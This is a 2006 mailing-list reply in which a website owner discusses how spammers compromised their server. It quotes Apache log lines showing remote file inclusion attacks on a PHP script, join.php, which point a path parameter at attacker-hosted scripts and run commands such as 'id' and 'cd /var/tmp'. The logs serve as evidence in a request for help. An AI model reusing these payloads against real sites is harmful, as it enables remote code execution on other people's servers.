-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Tue, 23 May 2006 08:45:30 +0100 Paul Howarth <paul(a)city-fan.org> wrote:
On Mon, 2006-05-22 at 23:11 -0400, CodeHeads wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> On Tue, 23 May 2006 00:14:32 +0000
> replies-lists-redhat(a)listmail.innovate.net wrote:
> > i haven't been following this topic in great detail, but i suspect that
> > you have a form on your site that is being exploited for "form
spam".
> > if you're not familiar with this, search google for "form spam".
> >
> > - Rick
>
>
> Rick,
> Thank you, No, I have not heard of this.
I don't think that's what this is. Form spam takes advantage of
poorly-coded mail/contact forms and uses them to send mail to recipients
other than those intended by the form designer.
What's happening here is that the spammer is running their own code
(downloaded into /tmp) to send the mail, a rather more serious
situation.
Paul.
I might not know too much but I really think they are using my forms. I found
quite a few log entries. Here are a few.
81.199.173.8 - - [22/May/2006:18:57:51 -0400]
"POST
/topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://www.tiffefermaintfashion.com/gbook/tmp/xzblog.txt?
HTTP/1.0" 200 5923
AOL:
172.179.33.217 - - [21/May/2006:07:58:01 -0400]
"GET
/topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=id
HTTP/1.1" 200 2374
172.179.33.217 - - [21/May/2006:07:58:20 -0400]
"GET
/topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=w
HTTP/1.1" 200 2412
172.179.33.217 - - [21/May/2006:07:58:34 -0400]
"GET
/topsites/sources/join.php?FORM%5burl%5d=owned&CONFIG%5bcaptcha%5d=1&CONFIG%5bpath%5d=http://xpl.netmisphere2.com/CMD.gif?&cmd=cd%20/var/tmp
HTTP/1.1" 200 2323
And the
xpl.netmisphere2.com site has hacking information:
http://xpl.netmisphere2.com/ I think this outta be illegal!!
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)
iD8DBQFEcylffw3TK8jhZrsRAq16AJ930YTN4X/cSN8NZEVHYfJYjQ/dfwCgmTED
xgS0Iv+yX2HhWQkREzXW+SI=
=CyYw
-----END PGP SIGNATURE-----